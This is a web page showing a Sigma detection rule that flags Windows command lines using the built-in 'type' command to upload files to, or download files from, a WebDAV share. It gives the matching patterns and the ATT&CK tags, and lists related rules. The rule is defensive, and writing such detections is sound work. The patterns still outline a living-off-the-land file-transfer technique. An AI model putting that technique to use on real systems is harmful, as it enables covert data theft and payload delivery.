Potential Download/Upload Activity Using Type Command
Detects usage of the "type" command to download/upload data from WebDAV server
Sigma rule (View on GitHub)
1title: Potential Download/Upload Activity Using Type Command
2id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
3status: test
4description: Detects usage of the "type" command to download/upload data from WebDAV server
5references:
6 - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2022-12-14
9tags:
10 - attack.command-and-control
11 - attack.t1105
12logsource:
13 product: windows
14 category: process_creation
15detection:
16 # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command
17 selection_upload:
18 CommandLine|contains|all:
19 - 'type '
20 - ' > \\\\'
21 selection_download:
22 CommandLine|contains|all:
23 - 'type \\\\'
24 - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space
25 condition: 1 of selection_*
26falsepositives:
27 - Unknown
28level: medium
References
Related rules
- AppX Package Installation Attempts Via AppInstaller.EXE
- Arbitrary File Download Via GfxDownloadWrapper.EXE
- Browser Execution In Headless Mode
- Cisco Stage Data
- Command Line Execution with Suspicious URL and AppData Strings